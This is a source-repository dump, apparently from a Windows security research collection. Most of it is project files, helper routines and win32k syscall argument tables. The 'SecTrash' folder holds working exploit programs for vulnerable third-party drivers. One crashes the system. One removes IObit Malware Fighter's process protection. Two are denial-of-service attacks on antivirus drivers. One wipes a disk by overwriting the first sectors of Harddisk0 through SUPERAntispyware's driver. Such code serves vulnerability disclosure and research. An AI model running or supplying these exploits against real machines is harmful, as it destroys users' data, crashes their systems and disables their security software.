__forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x >= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/srvany2.vcxproj.filters: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {193b68bc-13ea-43ca-9f81-6a739b38bb42} 18 | 19 | 20 | 21 | 22 | Source Files 23 | 24 | 25 | minirtl 26 | 27 | 28 | minirtl 29 | 30 | 31 | minirtl 32 | 33 | 34 | minirtl 35 | 36 | 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | minirtl 46 | 47 | 48 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/srvany2.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\new\zoomit.exe "-win32k -sc 1024 -pc 1024 logn" 5 | WindowsLocalDebugger 6 | 7 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29519.87 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "win32u", "win32u\win32u.vcxproj", "{8AF1DA16-D7F8-4814-BF5D-526456A574B2}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | ReleaseForChecked|x86 = ReleaseForChecked|x86 13 | EndGlobalSection 14 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 15 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Debug|x86.ActiveCfg = Debug|Win32 16 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Debug|x86.Build.0 = Debug|Win32 17 | 
{8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Release|x86.ActiveCfg = Release|Win32 18 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Release|x86.Build.0 = Release|Win32 19 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.ReleaseForChecked|x86.ActiveCfg = ReleaseForChecked|Win32 20 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.ReleaseForChecked|x86.Build.0 = ReleaseForChecked|Win32 21 | EndGlobalSection 22 | GlobalSection(SolutionProperties) = preSolution 23 | HideSolutionNode = FALSE 24 | EndGlobalSection 25 | GlobalSection(ExtensibilityGlobals) = postSolution 26 | SolutionGuid = {487B1FDE-0E17-47E1-80E2-16076184F850} 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/main.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT hfiref0x, 2018 - 2019 4 | * 5 | * TITLE: MAIN.C 6 | * 7 | * VERSION: 1.01 8 | * 9 | * DATE: 06 Dec 2019 10 | * 11 | * Syscall stubs for NtUser/NtGdi 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | 20 | #if !defined UNICODE 21 | #error ANSI build is not supported 22 | #endif 23 | 24 | #if defined (_MSC_VER) 25 | #if (_MSC_VER >= 1900) //VS15, 17 etc 26 | #ifdef _DEBUG 27 | #pragma comment(lib, "vcruntimed.lib") 28 | #pragma comment(lib, "ucrtd.lib") 29 | #else 30 | #pragma comment(lib, "libucrt.lib") 31 | #pragma comment(lib, "libvcruntime.lib") 32 | #endif 33 | #endif 34 | #endif 35 | 36 | #include 37 | 38 | // 39 | // These files are machine generated, do not edit. 
40 | // 41 | #ifdef _RELEASE_FOR_CHECKED 42 | #include "w32kcall_checked.h" 43 | #include "w32parguments_checked.h" 44 | #else 45 | #include "w32kcall.h" 46 | #include "w32parguments.h" 47 | #endif 48 | 49 | ULONG W32pServiceLimit = sizeof(W32pServiceArgumentTable); 50 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by ver.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/ver.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/ROS/win32u/win32u/ver.rc -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/w32parguments.h: -------------------------------------------------------------------------------- 1 | /* MACHINE GENERATED, DO NOT EDIT */ 2 | UCHAR W32pServiceArgumentTable[] = { 3 | 1, 1, 6, 4, 5, 2, 3, 12, 6, 0, 1, 10, 1, 11, 1, 8, 1, 2, 2, 6, 4, 3, 1, 4, 2, 5, 1, 1, 8, 3, 1, 6, 11, 9, 4, 1, 3, 1, 2, 3, 4, 4, 6, 6, 2, 4, 1, 1, 1, 7, 1, 4 | 3, 3, 2, 2, 3, 2, 2, 2, 1, 8, 8, 2, 6, 1, 1, 2, 2, 1, 2, 5, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 2, 2, 3, 2, 11, 2, 2, 1, 2, 2, 2, 2, 3, 3, 3, 2, 2, 2, 3, 2, 5 | 2, 2, 2, 2, 4, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 3, 2, 6, 1, 1, 2, 1, 4, 2, 4, 6, 4, 5, 1, 1, 1, 1, 5, 1, 7, 4, 2, 7, 5, 11, 3, 8, 5, 3, 3, 9, 1, 3, 1, 0, 6 | 2, 5, 5, 4, 2, 3, 2, 3, 6, 6, 1, 
6, 2, 2, 1, 3, 1, 2, 3, 2, 2, 2, 9, 2, 3, 5, 7, 5, 6, 8, 3, 3, 2, 3, 2, 2, 2, 4, 4, 3, 3, 2, 3, 3, 2, 7, 4, 5, 1, 5, 7 | 1, 3, 5, 8, 4, 3, 3, 6, 7, 10, 0, 2, 2, 2, 7, 6, 5, 8, 0, 0, 5, 2, 3, 5, 2, 13, 3, 1, 4, 3, 3, 7, 6, 5, 1, 11, 4, 5, 4, 3, 3, 3, 1, 5, 2, 2, 6, 1, 5, 2, 8 | 2, 7, 1, 6, 6, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 4, 2, 2, 2, 16, 1, 3, 3, 3, 3, 1, 3, 1, 1, 3, 4, 2, 5, 2, 3, 3, 5, 3, 4, 1, 12, 16, 1, 1, 1, 5, 11, 2, 1, 1, 9 | 1, 1, 2, 3, 3, 3, 2, 8, 1, 4, 7, 4, 4, 2, 2, 2, 3, 3, 2, 4, 1, 2, 3, 2, 4, 2, 3, 4, 1, 0, 1, 1, 3, 2, 3, 0, 2, 4, 5, 1, 4, 15, 7, 3, 5, 3, 8, 2, 3, 1, 10 | 2, 1, 1, 1, 1, 1, 3, 5, 4, 4, 7, 11, 5, 0, 3, 3, 2, 0, 2, 4, 5, 4, 1, 2, 4, 3, 5, 1, 6, 2, 1, 1, 2, 0, 1, 5, 3, 2, 3, 0, 0, 0, 1, 2, 3, 4, 3, 4, 1, 1, 11 | 3, 0, 0, 2, 2, 6, 4, 4, 2, 3, 2, 1, 1, 3, 1, 1, 4, 2, 4, 4, 5, 5, 0, 2, 0, 3, 5, 4, 3, 3, 3, 2, 2, 1, 2, 3, 3, 1, 2, 2, 3, 1, 4, 2, 3, 4, 12, 3, 3, 3, 12 | 1, 2, 7, 1, 1, 0, 4, 4, 7, 3, 0, 2, 2, 6, 3, 4, 4, 2, 3, 3, 2, 1, 5, 4, 4, 3, 3, 4, 2, 1, 2, 3, 6, 2, 4, 7, 4, 4, 3, 1, 1, 3, 2, 4, 1, 4, 7, 8, 3, 3, 13 | 1, 2, 1, 4, 3, 3, 1, 2, 1, 2, 4, 1, 5, 1, 2, 4, 4, 4, 1, 1, 3, 2, 3, 1, 4, 2, 1, 3, 4, 2, 4, 2, 2, 4, 1, 2, 2, 4, 2, 4, 2, 7, 3, 3, 6, 4, 3, 8, 1, 3, 14 | 2, 2, 0, 1, 4, 1, 2, 6, 7, 1, 6, 5, 6, 3, 2, 1, 1, 1, 1, 3, 0, 2, 3, 3, 10, 4, 4, 2, 3, 1, 2, 1, 3, 3, 1, 0, 6, 2, 0, 3, 4, 0, 0, 3, 3, 6, 4, 4, 6, 3, 15 | 6, 1, 1, 3, 1, 1, 11, 11, 11, 1, 8, 7, 10, 5, 9, 7, 10, 8, 10, 13, 4, 2, 1, 3, 5, 1, 1, 0, 1, 1, 2, 1, 1, 5, 2, 3, 1, 5, 1, 1, 2, 2, 2, 3, 3, 4, 1, 1, 2, 2, 16 | 1, 4, 3, 1, 1, 4, 6, 1, 4, 2, 1, 3, 2, 1, 4, 4, 4, 4, 4, 2, 3, 2, 2, 3, 1, 1 }; 17 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/w32parguments_checked.h: -------------------------------------------------------------------------------- 1 | /* MACHINE GENERATED, DO NOT EDIT */ 2 | UCHAR W32pServiceArgumentTable[] = { 3 | 1, 1, 6, 4, 5, 2, 3, 12, 6, 0, 1, 10, 1, 11, 1, 8, 1, 2, 2, 6, 4, 3, 1, 4, 2, 5, 1, 
1, 8, 3, 1, 6, 11, 9, 4, 1, 3, 1, 2, 3, 4, 4, 6, 6, 2, 4, 1, 1, 1, 7, 1, 4 | 3, 3, 2, 2, 3, 2, 2, 2, 1, 8, 8, 2, 6, 1, 1, 2, 2, 1, 2, 5, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 2, 2, 3, 2, 11, 2, 2, 1, 2, 2, 2, 2, 3, 3, 3, 2, 2, 2, 3, 2, 5 | 2, 2, 2, 2, 4, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 3, 2, 6, 1, 1, 2, 1, 4, 2, 4, 6, 4, 5, 1, 1, 1, 1, 5, 1, 7, 4, 2, 7, 5, 11, 3, 8, 5, 3, 3, 9, 1, 3, 1, 0, 6 | 2, 5, 5, 4, 2, 3, 2, 3, 6, 6, 1, 6, 2, 2, 1, 3, 1, 2, 3, 2, 2, 2, 9, 2, 3, 5, 7, 5, 6, 8, 3, 3, 2, 3, 2, 2, 2, 4, 4, 3, 3, 2, 3, 3, 2, 7, 4, 5, 1, 5, 7 | 1, 3, 5, 8, 4, 3, 3, 6, 7, 10, 0, 2, 2, 2, 7, 6, 5, 8, 0, 0, 5, 2, 3, 5, 2, 13, 3, 1, 4, 3, 3, 7, 6, 5, 1, 11, 4, 5, 4, 3, 3, 3, 1, 5, 2, 2, 6, 1, 5, 2, 8 | 2, 7, 1, 6, 6, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 4, 2, 2, 2, 16, 1, 3, 3, 3, 3, 1, 3, 1, 1, 3, 4, 2, 5, 2, 3, 3, 5, 3, 4, 1, 12, 16, 1, 1, 1, 5, 11, 2, 1, 1, 9 | 1, 1, 2, 3, 3, 3, 2, 8, 1, 4, 7, 4, 4, 2, 2, 2, 3, 3, 2, 4, 1, 2, 3, 2, 4, 2, 3, 4, 1, 0, 1, 1, 3, 2, 3, 0, 2, 4, 5, 1, 4, 15, 7, 3, 5, 3, 8, 2, 3, 1, 10 | 2, 1, 1, 1, 1, 1, 3, 5, 4, 4, 7, 11, 5, 0, 3, 3, 2, 0, 2, 4, 5, 4, 1, 2, 4, 3, 5, 1, 6, 2, 1, 1, 2, 0, 1, 5, 3, 2, 3, 0, 0, 0, 1, 2, 3, 4, 3, 4, 1, 1, 11 | 3, 0, 0, 2, 2, 6, 4, 4, 2, 3, 2, 1, 1, 3, 1, 1, 4, 2, 4, 4, 5, 5, 0, 2, 0, 3, 5, 4, 3, 3, 3, 2, 2, 1, 2, 3, 3, 1, 2, 2, 3, 1, 4, 2, 3, 4, 12, 3, 3, 3, 12 | 1, 2, 7, 1, 1, 0, 4, 4, 7, 3, 0, 2, 2, 6, 3, 4, 4, 2, 3, 3, 2, 1, 5, 4, 4, 3, 3, 4, 2, 1, 2, 3, 6, 2, 4, 7, 4, 4, 3, 1, 1, 3, 2, 4, 1, 4, 7, 8, 3, 3, 13 | 1, 2, 1, 4, 3, 3, 1, 2, 1, 2, 4, 1, 5, 1, 2, 4, 4, 4, 1, 1, 3, 2, 3, 1, 4, 2, 1, 3, 4, 2, 4, 2, 2, 4, 1, 2, 2, 4, 2, 4, 2, 7, 3, 3, 6, 4, 3, 8, 1, 3, 14 | 2, 2, 0, 1, 4, 1, 2, 6, 7, 1, 6, 5, 6, 3, 2, 1, 1, 1, 1, 3, 0, 2, 3, 3, 10, 4, 4, 2, 3, 1, 2, 1, 3, 3, 1, 0, 6, 2, 0, 3, 4, 0, 0, 3, 3, 6, 4, 4, 6, 3, 15 | 6, 1, 1, 3, 1, 1, 11, 11, 11, 1, 8, 7, 10, 5, 9, 7, 10, 8, 10, 13, 4, 2, 1, 3, 5, 1, 1, 0, 1, 1, 2, 1, 1, 5, 2, 3, 1, 5, 1, 1, 2, 2, 2, 3, 3, 4, 1, 1, 2, 2, 16 | 1, 4, 3, 1, 1, 4, 6, 1, 4, 2, 1, 3, 2, 2, 2, 1, 
1, 2, 1, 4, 4, 4, 4, 4, 2, 3, 2, 2, 3, 1, 1 }; 17 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/win32u.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Resource Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/win32u.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/SecTrash/asusgio2.c: -------------------------------------------------------------------------------- 1 | NTSTATUS CallDriver( 2 | _In_ HANDLE DeviceHandle, 3 | _In_ ULONG IoControlCode, 4 | _In_ PVOID InputBuffer, 5 | _In_ ULONG InputBufferLength, 6 | _In_opt_ PVOID OutputBuffer, 7 | _In_opt_ ULONG OutputBufferLength) 8 | { 9 | BOOL bResult = FALSE; 10 | IO_STATUS_BLOCK ioStatus; 11 | 12 | return NtDeviceIoControlFile(DeviceHandle, 13 | NULL, 14 | NULL, 15 | NULL, 16 | &ioStatus, 17 | IoControlCode, 18 | InputBuffer, 19 | InputBufferLength, 20 | OutputBuffer, 21 | OutputBufferLength); 22 | 23 | } 24 | 25 | BOOL supWriteBufferToFile( 26 | _In_ LPWSTR lpFileName, 27 | _In_ PVOID Buffer, 28 | _In_ DWORD BufferSize 29 | ) 30 | { 31 | HANDLE hFile; 32 | DWORD bytesIO; 33 | 34 | hFile = CreateFileW(lpFileName, 35 | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); 36 | 37 | if (hFile == INVALID_HANDLE_VALUE) { 38 | return FALSE; 39 | } 40 | 
41 | WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL); 42 | CloseHandle(hFile); 43 | 44 | return (bytesIO == BufferSize); 45 | } 46 | 47 | int main() 48 | { 49 | // 50 | // Uncomment to generate unlocking resource. 51 | // 52 | /* 53 | AES_ctx ctx; 54 | DWORD a[4] = { 0x16157EAA, 0xA6D2AE28, 0x8815F7AB, 0x3C4FCF09 }; 55 | BYTE Buffer[16]; 56 | AES_init_ctx(&ctx, (uint8_t*)a); 57 | LARGE_INTEGER fileTime; 58 | ULONG seconds = 0; 59 | GetSystemTimePreciseAsFileTime((PFILETIME)&fileTime); 60 | RtlTimeToSecondsSince1970(&fileTime, &seconds); 61 | RtlSecureZeroMemory(&Buffer, sizeof(Buffer)); 62 | RtlCopyMemory(Buffer, &seconds, sizeof(DWORD)); 63 | AES_ECB_encrypt(&ctx, (uint8_t*)Buffer); 64 | supWriteBufferToFile((LPWSTR)L"ASUSCERT.bin", Buffer, sizeof(Buffer)); 65 | return; 66 | */ 67 | 68 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\Asusgio2"), 69 | GENERIC_READ | GENERIC_WRITE, 70 | 0, 71 | NULL, 72 | OPEN_EXISTING, 73 | 0, 74 | NULL); 75 | 76 | if (deviceHandle == INVALID_HANDLE_VALUE) { 77 | printf_s("[!] Unable to open device\r\n"); 78 | return -1; 79 | } 80 | else { 81 | printf_s("[+] Asusgio2 device opened\r\n"); 82 | } 83 | 84 | 85 | printf_s("[+] Hit any key to BSOD\r\n"); 86 | system("pause"); 87 | 88 | UCHAR dBuffer[100]; 89 | 90 | NTSTATUS ntStatus = CallDriver(deviceHandle, 91 | 0xA0402450, 92 | &dBuffer, 93 | 1024, 94 | NULL, 95 | 0); 96 | 97 | if (!NT_SUCCESS(ntStatus)) { 98 | printf_s("[!] 
Failed, NTSTATUS (0x%lX)\r\n", ntStatus); 99 | } 100 | 101 | CloseHandle(deviceHandle); 102 | 103 | return 0; 104 | } 105 | -------------------------------------------------------------------------------- /source/SecTrash/iobitcallbacks.c: -------------------------------------------------------------------------------- 1 | #pragma warning(disable: 4005) 2 | 3 | #include 4 | #include 5 | #include 6 | #include "ntos.h" 7 | 8 | NTSTATUS CallDriver( 9 | _In_ HANDLE DeviceHandle, 10 | _In_ ULONG IoControlCode, 11 | _In_opt_ PVOID InputBuffer, 12 | _In_opt_ ULONG InputBufferLength, 13 | _In_opt_ PVOID OutputBuffer, 14 | _In_opt_ ULONG OutputBufferLength) 15 | { 16 | BOOL bResult = FALSE; 17 | IO_STATUS_BLOCK ioStatus; 18 | 19 | return NtDeviceIoControlFile(DeviceHandle, 20 | NULL, 21 | NULL, 22 | NULL, 23 | &ioStatus, 24 | IoControlCode, 25 | InputBuffer, 26 | InputBufferLength, 27 | OutputBuffer, 28 | OutputBufferLength); 29 | 30 | } 31 | 32 | typedef struct _CALL_DRV { 33 | ULONG Value1; 34 | ULONG Value2; 35 | HANDLE Pid1; 36 | HANDLE Pid2; 37 | BYTE Spare[392]; 38 | } CALL_DRV, * PCALL_DRV; 39 | 40 | int main() 41 | { 42 | NTSTATUS ntStatus; 43 | 44 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\ImfObCallback"), 45 | GENERIC_READ | GENERIC_WRITE, 46 | 0, 47 | NULL, 48 | OPEN_EXISTING, 49 | 0, 50 | NULL); 51 | 52 | if (deviceHandle == INVALID_HANDLE_VALUE) { 53 | printf_s("[!] Unable to open device\r\n"); 54 | #ifndef _DEBUG 55 | return -1; 56 | #endif 57 | } 58 | else { 59 | printf_s("[+] ImfObCallback device opened\r\n"); 60 | } 61 | 62 | // 63 | // Remove protection from IOBit processes. 64 | // IMF.exe 65 | // IMFCore.exe 66 | // 67 | 68 | ntStatus = CallDriver(deviceHandle, 69 | 0x22200C, 70 | NULL, 71 | 0, 72 | NULL, 73 | 0); 74 | 75 | if (NT_SUCCESS(ntStatus)) { 76 | printf_s("[~] Protection removed\r\n"); 77 | } 78 | else { 79 | printf_s("[~] Error (NTSTATUS 0x%lx)\r\n", ntStatus); 80 | } 81 | 82 | system("pause"); 83 | 84 | // 85 | // Protect ourself. 
86 | // 87 | 88 | CALL_DRV request; 89 | DWORD procId1 = GetCurrentProcessId(), procId2; 90 | 91 | GetWindowThreadProcessId(GetDesktopWindow(), &procId2); //anything else 92 | 93 | RtlZeroMemory(&request, sizeof(request)); 94 | 95 | request.Pid1 = UlongToHandle(procId1); 96 | request.Pid2 = UlongToHandle(procId2); 97 | 98 | ntStatus = CallDriver(deviceHandle, 99 | 0x222008, 100 | &request, 101 | sizeof(request), 102 | NULL, 103 | 0); 104 | 105 | if (NT_SUCCESS(ntStatus)) { 106 | printf_s("[~] Protection installed, try to kill me\r\n"); 107 | } 108 | else { 109 | printf_s("[~] Error (NTSTATUS 0x%lx)\r\n", ntStatus); 110 | } 111 | 112 | system("pause"); 113 | 114 | CloseHandle(deviceHandle); 115 | } 116 | -------------------------------------------------------------------------------- /source/SecTrash/maxproc64.c: -------------------------------------------------------------------------------- 1 | int main() 2 | { 3 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"), 4 | GENERIC_READ | GENERIC_WRITE, 5 | 0, 6 | NULL, 7 | OPEN_EXISTING, 8 | 0, 9 | NULL); 10 | 11 | if (deviceHandle == INVALID_HANDLE_VALUE) { 12 | printf_s("[!] 
Unable to open device\r\n"); 13 | return -1; 14 | } 15 | else { 16 | printf_s("[+] MaxProc64 device opened\r\n"); 17 | } 18 | 19 | NTSTATUS ntStatus; 20 | 21 | ntStatus = CallDriver(deviceHandle, 22 | 0x220019, 23 | (PVOID)0xFFFFFFFF12345678, 24 | 0, 25 | NULL, 26 | 0); 27 | 28 | printf_s("[+] CallDriver NTSTATUS 0x%lX\r\n", ntStatus); 29 | 30 | 31 | CloseHandle(deviceHandle); 32 | } 33 | -------------------------------------------------------------------------------- /source/SecTrash/readme.txt: -------------------------------------------------------------------------------- 1 | secureaplus.c - SecureAPlus AV SAScan driver Denial of Service 2 | iobitcallbacks.c - IObit Malware Fighter ImfObCallback.sys bypass 3 | bkavsp.c - BKAVSP Arbitrary File Deletion 4 | superantispyware.c - SUPERAntispyware disk wiper 5 | maxproc64.c - MaxSecure MaxProc64 driver Denial of Service 6 | iobit_winring0.c - IOBit WinRing0 driver information disclosure 7 | asusgio2.c - ASUS GiveIO driver unlock 8 | logitech.c - Logitech LgCoreTemp.sys driver information disclosure 9 | enetech.c - EneTech driver arbitrary kernel memory read/information disclosure 10 | glckio2.c - Gigabyte glckio2 driver information disclosure/unlock 11 | -------------------------------------------------------------------------------- /source/SecTrash/secureaplus.c: -------------------------------------------------------------------------------- 1 | #pragma warning(disable: 4005) 2 | 3 | #include 4 | #include 5 | #include 6 | #include "ntos.h" 7 | 8 | NTSTATUS CallDriver( 9 | _In_ HANDLE DeviceHandle, 10 | _In_ ULONG IoControlCode, 11 | _In_opt_ PVOID InputBuffer, 12 | _In_opt_ ULONG InputBufferLength, 13 | _In_opt_ PVOID OutputBuffer, 14 | _In_opt_ ULONG OutputBufferLength) 15 | { 16 | BOOL bResult = FALSE; 17 | IO_STATUS_BLOCK ioStatus; 18 | 19 | return NtDeviceIoControlFile(DeviceHandle, 20 | NULL, 21 | NULL, 22 | NULL, 23 | &ioStatus, 24 | IoControlCode, 25 | InputBuffer, 26 | InputBufferLength, 27 | 
OutputBuffer, 28 | OutputBufferLength); 29 | 30 | } 31 | 32 | int main() 33 | { 34 | NTSTATUS ntStatus; 35 | 36 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\SAScan"), 37 | GENERIC_READ | GENERIC_WRITE, 38 | 0, 39 | NULL, 40 | OPEN_EXISTING, 41 | 0, 42 | NULL); 43 | 44 | if (deviceHandle == INVALID_HANDLE_VALUE) { 45 | printf_s("[!] Unable to open device\r\n"); 46 | #ifndef _DEBUG 47 | return -1; 48 | #endif 49 | } 50 | else { 51 | printf_s("[+] SAScan device opened\r\n"); 52 | } 53 | 54 | ntStatus = CallDriver(deviceHandle, 55 | 0x9C40E404, 56 | NULL, 57 | 0, 58 | NULL, 59 | 0); 60 | 61 | printf_s("[~] (NTSTATUS 0x%lx)\r\n", ntStatus); 62 | 63 | system("pause"); 64 | 65 | CloseHandle(deviceHandle); 66 | } 67 | -------------------------------------------------------------------------------- /source/SecTrash/superantispyware.c: -------------------------------------------------------------------------------- 1 | #pragma warning(disable: 4005) 2 | 3 | #include 4 | #include 5 | #include 6 | #include "ntos.h" 7 | 8 | NTSTATUS CallDriver( 9 | _In_ HANDLE DeviceHandle, 10 | _In_ ULONG IoControlCode, 11 | _In_opt_ PVOID InputBuffer, 12 | _In_opt_ ULONG InputBufferLength, 13 | _In_opt_ PVOID OutputBuffer, 14 | _In_opt_ ULONG OutputBufferLength) 15 | { 16 | BOOL bResult = FALSE; 17 | IO_STATUS_BLOCK ioStatus; 18 | 19 | return NtDeviceIoControlFile(DeviceHandle, 20 | NULL, 21 | NULL, 22 | NULL, 23 | &ioStatus, 24 | IoControlCode, 25 | InputBuffer, 26 | InputBufferLength, 27 | OutputBuffer, 28 | OutputBufferLength); 29 | 30 | } 31 | 32 | #pragma pack(push, 1) 33 | typedef struct _CALL_DRV { 34 | WCHAR DeviceName[2048]; 35 | LARGE_INTEGER StartingOffset; // +0x1000 36 | SIZE_T DataSize; // +0x1008 37 | PVOID DataPtr; // +0x1010 38 | } CALL_DRV, * PCALL_DRV; 39 | #pragma pack(pop) 40 | 41 | ULONG u = FIELD_OFFSET(CALL_DRV, DataPtr); 42 | 43 | #define SAS_DEVICE 0x9C40 44 | #define IOCTL_SAS_CALLDRIVER CTL_CODE(SAS_DEVICE, 0x850, METHOD_BUFFERED, FILE_ANY_ACCESS) 45 | 46 | int 
main() 47 | { 48 | NTSTATUS ntStatus; 49 | CALL_DRV request; 50 | 51 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\SASKUTIL"), 52 | GENERIC_READ | GENERIC_WRITE, 53 | 0, 54 | NULL, 55 | OPEN_EXISTING, 56 | 0, 57 | NULL); 58 | 59 | if (deviceHandle == INVALID_HANDLE_VALUE) { 60 | printf_s("[!] Unable to open device\r\n"); 61 | #ifndef _DEBUG 62 | return -1; 63 | #endif 64 | } 65 | else { 66 | printf_s("[+] SASKUTIL device opened\r\n"); 67 | } 68 | 69 | system("pause"); 70 | 71 | WCHAR writeData[512]; 72 | 73 | memset(&writeData, 0xAB, sizeof(writeData)); 74 | RtlSecureZeroMemory(&request, sizeof(request)); 75 | 76 | wcscpy_s(request.DeviceName, L"\\Device\\Harddisk0\\DR0"); 77 | request.DataSize = sizeof(writeData); 78 | request.DataPtr = &writeData; 79 | 80 | for (ULONG i = 0; i < 65; i++) { 81 | 82 | request.StartingOffset.LowPart = (i * 512); 83 | 84 | ntStatus = CallDriver(deviceHandle, 85 | IOCTL_SAS_CALLDRIVER, 86 | &request, 87 | sizeof(CALL_DRV), 88 | NULL, 89 | 0); 90 | 91 | printf_s("[+] CallDriver NTSTATUS 0x%lX\r\n", ntStatus); 92 | } 93 | 94 | CloseHandle(deviceHandle); 95 | } 96 | -------------------------------------------------------------------------------- /source/StripDebug/StripDebug.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StripDebug", "StripDebug.vcxproj", "{177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Debug|x64.ActiveCfg = Debug|x64 15 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Debug|x64.Build.0 = 
